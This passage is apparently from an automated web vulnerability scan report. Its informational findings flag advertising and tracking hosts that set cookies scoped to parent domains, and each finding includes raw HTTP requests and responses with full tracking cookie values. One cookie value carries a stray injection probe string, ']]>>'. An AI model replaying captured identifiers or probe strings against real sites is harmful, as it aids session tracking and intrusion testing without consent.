GET /meta?_o=65121&_t=tg&ssv_tg_1=&ssv_tg_2=&ssv_tg_3=000&ssv_tg_4=&ssv_duid=&ssv_tg_5=0&ssv_tg_6=0&ssv_tg_7=0&ssv_tg_8=k23-0,k24-0,k25-0,k26-0,k28-0,k29-0,k30-0,k31-0,k32-0,k33-0,k34-0,k35-0,k36-0 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:20 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close


13.89. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3= HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1; 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:13:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close


13.90. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...

13.91. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...

13.92. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-15.js?cb=0.46589411422610283 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; cd=false; lm="2 Oct 2011 23:50:10 GMT"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2]]>>&12566^46&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

13.93. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-2.js?cb=0.7007977575995028 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk=7743/12359; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2&12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3226027.js^1^1317599977^1317599977&3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:59:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1808

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226027"
...[SNIP]...

13.94. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-9.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-9.js?cb=0.09602085058577359 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; rdk=8154/13209; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3332

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182365"
...[SNIP]...

13.95. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

13.96. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
